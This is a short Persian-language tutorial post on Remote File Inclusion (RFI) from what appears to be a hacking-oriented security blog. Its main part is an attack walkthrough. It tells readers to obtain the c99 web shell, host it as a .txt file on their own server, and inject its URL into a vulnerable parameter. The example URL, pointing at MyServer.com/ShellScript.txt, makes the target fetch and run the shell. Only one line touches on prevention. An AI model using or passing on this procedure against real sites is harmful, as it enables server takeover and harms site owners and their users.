شما هم اکنون در حال مشاهده مطلب باگ RFI چیست ؟ + اموزش کامل و جامع باگ RFI از استار سکوریتی می باشید

این صفحه تاکنون 43 بار بازدید داشته است
چکیده مطلب

با سلام به همه کاربران گرامی سایت استار سکوریتی امروز با آموزش باگ RFI در خدمت شما هستیم. که یکی دیگر از باگ های وب اپلیکیشن ها باگ RFI است که بسیار میتواند خطر ناک باشد و مخفف Remote File Inclusion است که مستقیما باعث اجرای شل اسکریپت در سرور شود و همچنین این حفره امنیتی از اشتباه […]

باگ RFI چیست ؟ + اموزش کامل و جامع باگ RFI
آموزش ، ابزار تست و نفوذ ۲۶ آبان ۹۷ 43 بازدید

با سلام به همه کاربران گرامی سایت استار سکوریتی
امروز با آموزش باگ RFI در خدمت شما هستیم.

که یکی دیگر از باگ های وب اپلیکیشن ها باگ RFI است که بسیار میتواند خطر ناک باشد

و مخفف Remote File Inclusion است که مستقیما باعث اجرای شل اسکریپت در سرور شود

و همچنین این حفره امنیتی از اشتباه های برنامه نویس ایجاد میشود

و حتما باید برای امنیت و جلوگیری از این باگ به زبان برنامه نویسی کاملا مسلط بوده

و باید ورودی های اپلیکیشن را کنترل کند و از فایروال های قدرتمند استفاده نمایید.

سطح دستریسی با باگ RFI

این باگ جز باگ های خطرناک محسوب میشود و دسترسی که نفوذگر میتواند با استفاده از این باگ بگیرد اجرای شل اسکریپت است

که در واقع با اجرای شل اسکریپت دسترسی نسبتا کاملی به سرور سایت تارگت خواهد داشت

اگر بخواهیم به طور متنی ان را توضیح دهیم هکر با دادن لینکی از شل اسکریپت به صورت txt به ورودی سایت اسیب پذیر شل را اجرا میکند

که در ادامه با مثال با نحوه کارکرد این باگ به طور کامل اشنا میشویم اشنا میشویم

نحوه باگ یابی و استفاده از RFI

برای پیدا کردن باگ RFI باید ورودی های مشکوک به این این باگ را پیدا کرده و در ان ها تست را انجام دهید

 

میتوانید از دانلود شل c99 را از اینجا انجام دهید

بعد از دریافت ان را در فایلی با پسوند .txt ذخیره کنید و در یک سرور ان را اپلود کنید

حال کافیست ادرس شل که در سرور خود اپلود کرده اید را به ورودی بدهید و مشاهده خواهید کرد که شل اسکریپت در سرور تارگت اجرا شده است

 

مثال

برای مثال ورودی ادرس زیر به باگ RFI اسیب پذیر است

http://site.com/index.php?m=site

در اینجا باید بجای ورودی سایت ادرس شلر خود را که در سرور دیگری به صورت txt ذخیره کرده بودیم را بدهیم

http://site.com/index.php?m=http://MyServer.com/ShellScript.txt

حال با زدن ان در url شل اسکریپت اجرا شده و دسترسی خواهید داشت.

 

مطالب پیشنهادی استار سکوریتی

کلیه حقوق این وب سایت نزد استار سکوریتی محفوظ می باشد و هرگونه کپی برداری از قالب و محتوا پیگرد قانونی دارد

طراحی و توسعه توسط سرخ گرافیک